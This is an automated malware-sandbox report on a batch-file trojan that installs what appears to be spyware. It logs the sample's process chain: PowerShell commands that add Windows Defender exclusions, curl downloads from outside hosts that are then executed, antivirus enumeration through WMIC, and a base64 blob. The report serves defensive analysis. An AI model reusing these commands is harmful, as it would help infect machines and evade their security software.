Process created: C:\Windows\System32\reg.exe reg query "HKU\S-1-5-19\Environment"

Source: [space]= .exe.5.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: is-JF90R.tmp.19.dr	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
Source: is-9ATRT.tmp.19.dr	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0

Source: is-JF90R.tmp.19.dr	Static PE information: Section: ZLIB complexity 1.0016526442307692
Source: is-JF90R.tmp.19.dr	Static PE information: Section: ZLIB complexity 1.0005696614583333
Source: is-JF90R.tmp.19.dr	Static PE information: Section: ZLIB complexity 1.0007161458333333
Source: is-JF90R.tmp.19.dr	Static PE information: Section: ZLIB complexity 1.021484375
Source: is-JF90R.tmp.19.dr	Static PE information: Section: ZLIB complexity 1.0003823138297872
Source: is-9ATRT.tmp.19.dr	Static PE information: Section: ZLIB complexity 1.0017903645833333
Source: is-9ATRT.tmp.19.dr	Static PE information: Section: ZLIB complexity 1.0005696614583333
Source: is-9ATRT.tmp.19.dr	Static PE information: Section: ZLIB complexity 1.0008680555555556
Source: is-9ATRT.tmp.19.dr	Static PE information: Section: ZLIB complexity 1.021484375
Source: is-9ATRT.tmp.19.dr	Static PE information: Section: ZLIB complexity 1.0003551136363635

Source: [space]= .exe.5.dr, Settings.cs

Base64 encoded string: 'HUXwGsL2qA2Klp4GxVUBZj53IhCCt8FRahOgIF5wxEYiSEtN7bkJKWuhYdnhpIJq4ktEaX6sYgMULWkDwyERY4HDwqInaXGo4qnrUpvjd0tmKZWB2ku0E0SAcqRtPSSAZhZds1rHDewgKe2WTGuymPkDYmPnYBULitMlA1SA1nwjEuy7w3ZIhcXK5WFFmErCKl6aRQWbxu58cB8mxRzdkLmFVComwNWx4uYcxYpgh7TwfXq4XbRVOOa770EPksojXIErlfyYkT4l1zj6UtPU5BjpTad5Ua4yTsYXT8S0m1u3SyGHRG30dTnWiXXLC1DKYGSIbLnVaXrDQoWeUWnNfEU8FCy5lHytxjfMf7pGciZFljG2A20pOznTuSCYWqtSi6OpJK7Vqhu6nOXe445rQJf74LaN4QsuyHgnVZsz3e8pEqpg4hcauBCZbQu7suaZxAHgrtJfMFxvKy3Ne3SXwS8xEGLFouGJDi0EiJyLX6OoNQPlVgcybDmfATbkhEza8nrk7znVFH8yETkx0isISQqA4VDPrNmTHwpihnnf1HtUEwaqsms7VrHs6rolwYm0dorQnBPM3MPLfW4I3VfEeo7Yp5lz8Bsdd20YFKCqWfDIb5Mjvgra1iWypSkqZYN2dvqmffCsSyq7kz6ttBEbTRk4gBsvjUR7RKnoOiEPd8HD0XNzUz6XUviLLvGdwPJ6gspaLReK5y6UJhEIx1asX2nfkcdbckbNzKgHrwoDVwbexOBmr6p4xZjmFJyswCqUXsd8A5aBNXXjbIqVaztf4fZZj2Bh65PSGGHFtClugnraBAL5ccR6RKZ0TEZH42DQIEdUBlkXN88Qx8XjqEFdnSA4qPupmezmkaR5gz4z03sSLIDUpyZzwimzEhnvz4usJVpWqaD0JOltjrsiLaAwE8zBwb17MJA5I8IzcqmOviqi62QVxFjZ37oKfniPiFnAOokjj2FewuBeSRE3KfJHijBJU7TxHXoq4pTRRpv48ElI6J0OioEC4gannaPkiQXYGTil6wlesOHd71MKGFPbTmuYOonzaLVrqMCmjOQvDjSqY6puOEdcB5FchKWRJuDh1Zvuzij0ycXtTEAR82lVq1puGiEZ17mSfux8K34oemnihVJdKFSQIq0AsBnQdK8zzFNhQAHE760EOHNuZkOvpWJy'

Source: classification engine

Classification label: mal100.troj.evad.winBAT@190/1078@15/9

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe

Code function: 67_2_00D2A2A0 GetLastError,_errno,strncpy,FormatMessageA,strrchr,strrchr,_errno,_errno,GetLastError,SetLastError,

67_2_00D2A2A0

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Code function: 53_2_033C7898 GetDiskFreeSpaceA,

53_2_033C7898

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe

Code function: 67_2_00D13700 memset,GetLastError,CreateToolhelp32Snapshot,GetLastError,Module32First,Module32Next,CloseHandle,

67_2_00D13700

Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\[space]= .exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8012:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4108:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5672:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7980:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8024:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2200:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5196:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7344:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7180:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5144:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7212:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7768:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7600:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7808:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8120:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5216:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7312:120:WilError_03

Source: C:\Windows\System32\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\181531736511434

Jump to behavior

Source: Yara match	File source: 73.0.spmm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000049.00000000.2712353086.0000000000401000.00000020.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match	File source: 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match	File source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-3JAMQ.tmp, type: DROPPED

Source: unknown

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\c5WMpr1cOc.bat" "

Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp

Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\plist.vbs"

Source: C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\[space]= .exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "cmd.exe" OR Caption = "wlg.exe" OR Caption = "spmm.exe" OR Caption = "spkl.exe" OR Caption = "spm.exe" OR Caption = "sem.exe" OR Caption = "clv.exe" OR Caption = "akl.exe" OR Caption = "sps.exe" OR Caption = "sime64.exe" OR Caption = "ff.exe" OR Caption = "mrec.exe" OR Caption = "clvhost.exe" OR Caption = "ffws.exe")
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SPMM.EXE'
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "cmd.exe" OR Caption = "wlg.exe" OR Caption = "spmm.exe" OR Caption = "spkl.exe" OR Caption = "spm.exe" OR Caption = "sem.exe" OR Caption = "clv.exe" OR Caption = "akl.exe" OR Caption = "sps.exe" OR Caption = "sime64.exe" OR Caption = "ff.exe" OR Caption = "mrec.exe" OR Caption = "clvhost.exe" OR Caption = "ffws.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SPS.EXE'
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SPM.EXE'
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SEM.EXE'
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SPKL.EXE'
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'CLV.EXE'

Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp

File read: C:\Users\user\Desktop\desktop.ini

Source: C:\Windows\System32\reg.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Source: spmm.exe, 00000049.00000002.2933025552.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: spmm.exe, 00000049.00000002.2933025552.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: spmm.exe, 00000049.00000002.2933025552.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: spmm.exe, 00000049.00000002.2933025552.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
Source: spmm.exe, 00000049.00000002.2933025552.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: spmm.exe, 00000049.00000002.2933025552.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: spmm.exe, 00000049.00000002.2933025552.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: spmm.exe, 00000049.00000002.2933025552.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: spmm.exe, 00000049.00000002.2933025552.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: spkl.exe, 00000035.00000002.2984780387.0000000007DBC000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2980946676.0000000006C06000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE if not exists `wlog` (`id` INTEGER PRIMARY KEY AUTOINCREMENT,`sTime`TEXT,`sJSon`TEXT);
Source: spmm.exe, 00000049.00000002.2933025552.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: spmm.exe, 00000049.00000002.2933025552.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: spmm.exe, 00000049.00000002.2933025552.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: c5WMpr1cOc.bat	Virustotal: Detection: 19%
Source: c5WMpr1cOc.bat	ReversingLabs: Detection: 26%

Source: spkl.exe	String found in binary or memory: NATS-SEFI-ADD
Source: spkl.exe	String found in binary or memory: NATS-DANO-ADD
Source: spkl.exe	String found in binary or memory: JIS_C6229-1984-b-add
Source: spkl.exe	String found in binary or memory: jp-ocr-b-add
Source: spkl.exe	String found in binary or memory: JIS_C6229-1984-hand-add
Source: spkl.exe	String found in binary or memory: jp-ocr-hand-add
Source: spkl.exe	String found in binary or memory: ISO_6937-2-add
Source: qrl.exe	String found in binary or memory: id-cmc-addExtensions
Source: qrl.exe	String found in binary or memory: t xml:space=.gif" border="0"</body> </html> overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script> /favicon.ico" />operating system" style="width:1target="_blank">State Universitytext-align:left; document.write(, including the around t
Source: qrl.exe	String found in binary or memory: Unable to complete request for channel-process-startup
Source: qrl.exe	String found in binary or memory: set-addPolicy
Source: qrl.exe	String found in binary or memory: dns-ipv6-addr
Source: qrl.exe	String found in binary or memory: dns-ipv4-addr
Source: qrl.exe	String found in binary or memory: false-start
Source: qrl.exe	String found in binary or memory: --dns-ipv4-addr <address>
Source: qrl.exe	String found in binary or memory: --dns-ipv6-addr <address>
Source: qrl.exe	String found in binary or memory: --false-start
Source: qrl.exe	String found in binary or memory: -h, --help
Source: qrl.exe	String found in binary or memory: -h, --help
Source: qrl.exe	String found in binary or memory: curl: try 'curl --help' or 'curl --manual' for more information
Source: qrl.exe	String found in binary or memory: curl: try 'curl --help' or 'curl --manual' for more information
Source: qrl.exe	String found in binary or memory: curl: try 'curl --help' or 'curl --manual' for more information
Source: qrl.exe	String found in binary or memory: curl: try 'curl --help' or 'curl --manual' for more information

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\c5WMpr1cOc.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg query "HKU\S-1-5-19\Environment"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\181531736511434'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl.exe --insecure -o "C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe" https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe "C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\\eb90c874-90f1-477e-bf8d-92cb4599bdb5.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg query "HKU\S-1-5-19\Environment"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5'"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\l" https://cdnbaynet.com/loader/link.php?prg_id=sfk
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\[space]= .exe" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Remove-MpPreference -exclusionPath "C:\Users\user\AppData\Local\Temp\181531736511434"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\[space]= .exe "C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\[space]= .exe"
Source: C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\[space]= .exe	Process created: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp "C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp" /SL5="$30454,32862490,227328,C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\[space]= .exe"
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\d.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\d.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\ex.cmd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\ex" /y
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\pswd.cmd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess '[space]= .*'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\*'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\ex.cmd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\ex" /y
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
